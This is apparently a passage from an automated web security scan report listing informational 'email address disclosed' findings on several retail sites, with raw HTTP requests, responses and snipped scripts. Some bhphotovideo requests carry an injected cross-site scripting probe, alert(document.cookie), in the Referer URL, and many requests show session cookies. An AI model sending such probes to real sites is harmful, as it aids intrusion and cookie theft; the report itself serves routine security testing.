Set-Cookie: rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 02:12:04 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

20.4. http://buy.travelguard.com/tgi2/js/siteCatalyst.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.travelguard.com
Path:	/tgi2/js/siteCatalyst.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /tgi2/js/siteCatalyst.js HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1463190879719%3B%20s_depth%3D2%7C1305512680332%3B%20gpv_pageName%3Dus_direct%253A/%7C1305543781337%3B%20s_pers_prop21%3D000329%7C1463221981339%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dus_direct%253A/%255E%255E/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255Eus_direct%253A/%2520%257C%2520/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dus_direct%2525253A/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//buy.travelguard.com/TGI2/proc/stateselector.aspx%2525253Fpcode%2525253DMYTG%25252526br%2525253Dtgdirect%25252526intcmp%2525253Dclc-001-DualCT%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Content-Length: 39896
Content-Type: application/x-javascript
Last-Modified: Mon, 29 Mar 2010 16:10:24 GMT
Accept-Ranges: bytes
ETag: "09893565acfca1:1ea23"
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:33:07 GMT

.../* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

20.5. http://hire.jobvite.com/CompanyJobs/Careers.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/Careers.aspx

Issue detail

The following email address was disclosed in the response:

service@bluenile.com

Request

Response

20.6. http://hire.jobvite.com/CompanyJobs/careers_8.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/careers_8.js

Issue detail

The following email addresses were disclosed in the response:

yourname@company.com
yourname@gmail.com
yourname@hotmail.com
yourname@yahoo.com

Request

GET /CompanyJobs/careers_8.js?v=118 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=43apaaeak4cjn155sab1plb2; guestidc=8b41a0ab-dfdd-4e51-b8b4-0325a58c4684

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 18:44:18 GMT
Accept-Ranges: bytes
ETag: "0ad44209dfbcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:31 GMT
Content-Length: 66581

.../*
* COPYRIGHT 2011 Jobvite, Inc. All rights reserved. This copyright notice is Copyright Management
* Information under 17 USC 1202 and is included to protect this work and deter copyright infrin
...[SNIP]...
</div>');
       _contactImportError = null;
   }
   var i = '';
   switch (_contactImportSource)
   {
       case 'LinkedIn':
           i += 'yourname@company.com';
           break;
       case 'Yahoo':
           i += 'yourname@yahoo.com';
           break;
       case 'Gmail':
           i += 'yourname@gmail.com';
           break;
       case 'Hotmail':
           i += 'yourname@hotmail.com';
           break;
       default:
           i = '';
           break;
   }
   d.addRow('<div">
...[SNIP]...

20.7. https://ordering.ftd.com/new-signup/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/new-signup/

Issue detail

The following email address was disclosed in the response:

autorenew@ftdi.com

Request

Response

20.8. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The following email address was disclosed in the response:

autorenew@ftdi.com

Request

Response

20.9. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The following email address was disclosed in the response:

autorenew@ftdi.com

Request

Response

20.10. http://pics.bluenile.com/1526758349/bundles/diamondsearch.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pics.bluenile.com
Path:	/1526758349/bundles/diamondsearch.js

Issue detail

The following email address was disclosed in the response:

brandon.aaron@gmail.com

Request

GET /1526758349/bundles/diamondsearch.js HTTP/1.1
Host: pics.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; stc=3NZR3Q; bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:32:44 GMT
Expires: Wed, 12 May 2021 15:25:54 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Content-Type: text/javascript;charset=ISO-8859-1
ETag: 2740050219
Server: Footprint Distributor V4.6
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Vary: Accept-Encoding
Content-Length: 93502

BN.namespace("diamonds");BN.diamonds=function(){return{getShapeName:function(A){var B={RD:"Round",PR:"Princess-Cut",EC:"Emerald-Cut",AS:"Asscher-Cut",MQ:"Marquise-Cut",OV:"Oval",RA:"Radiant-Cut",PS:"P
...[SNIP]...
U};this.getPricePerCarat=function(){return A};this.getMfgDate=function(){return R};this.getNonMfgDate=function(){return Z};this.getCertLab=function(){return B}}});
/* Copyright (c) 2008 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*/
(function
...[SNIP]...

20.11. https://secure.bhphotovideo.com/FrameWork/js/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bhphotovideo.com
Path:	/FrameWork/js/common.js

Issue detail

The following email address was disclosed in the response:

code@andresvidal.com

Request

GET /FrameWork/js/common.js?v=05152011 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 09 May 2011 03:00:18 GMT
ETag: "1ab2-4dc758c2"
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Mon, 16 May 2011 11:06:48 GMT
Connection: keep-alive
Content-Length: 6834

/* **************************************************
Copyright (c) 2008, B & H Foto & Electronics Corp. All rights reserved. http://wwww.bhphotovideo.com - Author: Andres Vidal
************************************************** */

/**
* jQuery-Plugin "Placeholder"
*
* @version: 1.1.0, 01.19.2011
*
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com
*
* Instructions: Call $(selector).placeholder(options) on an input element with an attribute placeholder.
* @example: $('input#search').placeholder(); // <in
...[SNIP]...
idget with Profile Support.
* This widget extends the default functionality of window.open() with the use of powerful profiles.
*
* @version: 1.0.0, 08.04.2010
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com/labs
*
* @arg url(mixed) The popup url or object containing an href. Example: Use object [this] or string 'http://www.google.com'
* @arg name(stri
...[SNIP]...

20.12. https://secure.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bhphotovideo.com
Path:	/FrameWork/js/jquery/jquery.styledDropdown.min.js

Issue detail

The following email address was disclosed in the response:

code@andresvidal.com

Request

GET /FrameWork/js/jquery/jquery.styledDropdown.min.js HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Server: Web-Server
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Apr 2010 03:00:24 GMT
ETag: "f26-4bcbc748"
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Mon, 16 May 2011 11:06:52 GMT
Connection: keep-alive
Content-Length: 3878

/**
* Styled Dropdown - jQuery Plugin v0.1.0
* Easily converts SELECT elements to eventful and styleable DL, DT, DD elements.
* Requires jQuery 1.3.x
*
* Copyright 2010, Andres Vidal (code@andresvidal.com)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://www.andresvidal.com/license/styledDropdown
*
* Instructions: Call $(selector).styledDropdown(options) on an element with a jQuery
...[SNIP]...

20.13. https://secure.bluenile.com/accounts/account-sign-in.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bluenile.com
Path:	/accounts/account-sign-in.html

Issue detail

The following email address was disclosed in the response:

service@bluenile.com

Request

Response

20.14. http://shop.pacsun.com/home.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.pacsun.com
Path:	/home.jsp

Issue detail

The following email address was disclosed in the response:

yourname@gmail.com

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: max-age=1
Date: Mon, 16 May 2011 01:58:43 GMT
Connection: close
Content-Length: 124098

                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
...[SNIP]...
var s=s_gi(s_account);
       s.linkTrackEvents    = 'event11';
       s.linkTrackVars    = 'events,eVar2';
       s.events            = 'event11';
       s.eVar2            = o.icid;
       s.tl(this,'o',o.tl);
   }
}
var email1default = "yourname@gmail.com";
$(function(){

   $("#emailBox").bind('keypress', function(event) {
       var code=event.charCode || event.keyCode;
       if(code && code == 13) {// if enter is pressed
           email1default = $('#emailBox
...[SNIP]...
<input id="email1" name="email" maxlength="40" autocomplete="off" value="yourname@gmail.com" type="text" class="defaultEmail text" tabindex="1" />
...[SNIP]...
<input id="emailBox" class="greyInput" name="email" type="text" value="yourname@gmail.com" autocomplete="OFF" size="12" onfocus="javascript:formInputs(this)" onblur="javascript:formInputsOut(this)" />
...[SNIP]...

20.15. http://shoprunner.force.com/content/JsContentElementsGNC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsGNC

Issue detail

The following email address was disclosed in the response:

MemberServices@ShopRunner.com

Request

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:18 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=8008
Expires: Mon, 16 May 2011 12:29:56 GMT
Date: Mon, 16 May 2011 10:16:28 GMT
Connection: close
Content-Length: 108383

function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...

20.16. http://shoprunner.force.com/content/JsContentElementsPET previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsPET

Issue detail

The following email address was disclosed in the response:

MemberServices@ShopRunner.com

Request

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:45 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=7868
Expires: Mon, 16 May 2011 12:29:04 GMT
Date: Mon, 16 May 2011 10:17:56 GMT
Connection: close
Content-Length: 106125

function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...

20.17. http://static.bhphotovideo.com/FrameWork/js/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.bhphotovideo.com
Path:	/FrameWork/js/common.js

Issue detail

The following email address was disclosed in the response:

code@andresvidal.com

Request

GET /FrameWork/js/common.js?v=05152011 HTTP/1.1
Host: static.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937
If-None-Match: "1ab2-4dc758c2"
If-Modified-Since: Mon, 09 May 2011 03:00:18 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 09 May 2011 03:00:18 GMT
ETag: "1ab2-4dc758c2"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, max-age=7200
Date: Mon, 16 May 2011 10:16:56 GMT
Connection: close
Content-Length: 6834

/* **************************************************
Copyright (c) 2008, B & H Foto & Electronics Corp. All rights reserved. http://wwww.bhphotovideo.com - Author: Andres Vidal
************************************************** */

/**
* jQuery-Plugin "Placeholder"
*
* @version: 1.1.0, 01.19.2011
*
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com
*
* Instructions: Call $(selector).placeholder(options) on an input element with an attribute placeholder.
* @example: $('input#search').placeholder(); // <in
...[SNIP]...
idget with Profile Support.
* This widget extends the default functionality of window.open() with the use of powerful profiles.
*
* @version: 1.0.0, 08.04.2010
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com/labs
*
* @arg url(mixed) The popup url or object containing an href. Example: Use object [this] or string 'http://www.google.com'
* @arg name(stri
...[SNIP]...

20.18. http://www.acehardware.com/js/LIB_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/js/LIB_core.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

GET /js/LIB_core.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:49 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 04 May 2011 08:47:00 GMT
ETag: "511655-a9a7-4a26f4cc6a900"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 16:47:49 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 43431

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the
...[SNIP]...

20.19. https://www.acehardware.com/checkout/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.acehardware.com
Path:	/checkout/index.jsp

Issue detail

The following email address was disclosed in the response:

joe@aol.com

Request

Response

20.20. https://www.acehardware.com/common/checkout/js/jsu-1.0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.acehardware.com
Path:	/common/checkout/js/jsu-1.0.js

Issue detail

The following email address was disclosed in the response:

me@bradhurley.com

Request

GET /common/checkout/js/jsu-1.0.js HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: https://www.acehardware.com/checkout/index.jsp?process=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511353374}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:35 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 15 Oct 2010 07:09:00 GMT
ETag: "147003d-62c0-492a280329b00"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 08:02:35 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 25280

/**
* @name script
*/
if(typeof(u) == 'undefined'){
/**
* the base class for the jsu library. does nothing right now
* @author Brad Hurley me@bradhurley.com
* @class
* @static
* @version 1.0.8
* @event serviceRequest {activeServiceRequests url parameters}
* @event serviceRequestComplete {activeServiceRequests url parameters}

...[SNIP]...

20.21. https://www.acehardware.com/js/LIB_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.acehardware.com
Path:	/js/LIB_core.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

GET /js/LIB_core.js HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: https://www.acehardware.com/checkout/index.jsp?process=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511353374}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:44 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 04 May 2011 08:47:00 GMT
ETag: "511655-a9a7-4a26f4cc6a900"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 08:02:44 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 43431

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the
...[SNIP]...

20.22. http://www.armaniexchange.com/category/customer+service/where+is+my+order/check+order+status.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.armaniexchange.com
Path:	/category/customer+service/where+is+my+order/check+order+status.do

Issue detail

The following email address was disclosed in the response:

custserv@armaniexchange.com

Request

GET /category/customer+service/where+is+my+order/check+order+status.do HTTP/1.1
Host: www.armaniexchange.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=iuoJJxDKPc84a1dE2-; mbcc=736A768E-F798-53C9-B056-8FE338824CC8; customer=none; basket=none; s_cc=true; fsr.s={"v":1,"rid":"1305510204631_768485","to":5,"c":"https://www.armaniexchange.com/account/login.do","pv":5,"lc":{"d0":{"v":5,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511392054}; gpv_p4l=Womens; s_sq=mlax5prod%3D%2526pid%253DWomens%2526pidt%253D1%2526oid%253Dhttp%25253A//www.armaniexchange.com/category/customer%25252Bservice/where%25252Bis%25252Bmy%25252Border/check%25252Border%25252Bstatus.do%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 10:16:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:16:29 GMT
Connection: close
Set-Cookie: customer=none; path=/; expires=Wed, 29-May-2013 10:16:29 GMT
Set-Cookie: basket=none; path=/; expires=Mon, 30-May-2011 10:16:29 GMT
Content-Length: 55800

<script language="JavaScript">
// Disable edit cell tab.
parent.editCell.className =
...[SNIP]...
<a href="/category/customer+service/contact+us.do">custserv@armaniexchange.com</a>
...[SNIP]...
<a href="/category/customer+service/contact+us.do">custserv@armaniexchange.com</a>
...[SNIP]...

20.23. http://www.bhphotovideo.com/FrameWork/js/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhphotovideo.com
Path:	/FrameWork/js/common.js

Issue detail

The following email address was disclosed in the response:

code@andresvidal.com

Request

GET /FrameWork/js/common.js?v=05152011 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541033888&t2=1305541035139&t3=1305541039955&t4=1305541030076&lti=1305541038716&ln=&hr=/find/cart.jsp&fti=1305541039955&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1:U&fd=0%3A0%3A%3B&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 09 May 2011 03:00:18 GMT
ETag: "1ab2-4dc758c2"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, max-age=7200
Date: Mon, 16 May 2011 10:17:22 GMT
Connection: close
Content-Length: 6834

/* **************************************************
Copyright (c) 2008, B & H Foto & Electronics Corp. All rights reserved. http://wwww.bhphotovideo.com - Author: Andres Vidal
************************************************** */

/**
* jQuery-Plugin "Placeholder"
*
* @version: 1.1.0, 01.19.2011
*
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com
*
* Instructions: Call $(selector).placeholder(options) on an input element with an attribute placeholder.
* @example: $('input#search').placeholder(); // <in
...[SNIP]...
idget with Profile Support.
* This widget extends the default functionality of window.open() with the use of powerful profiles.
*
* @version: 1.0.0, 08.04.2010
* @author: Andres Vidal
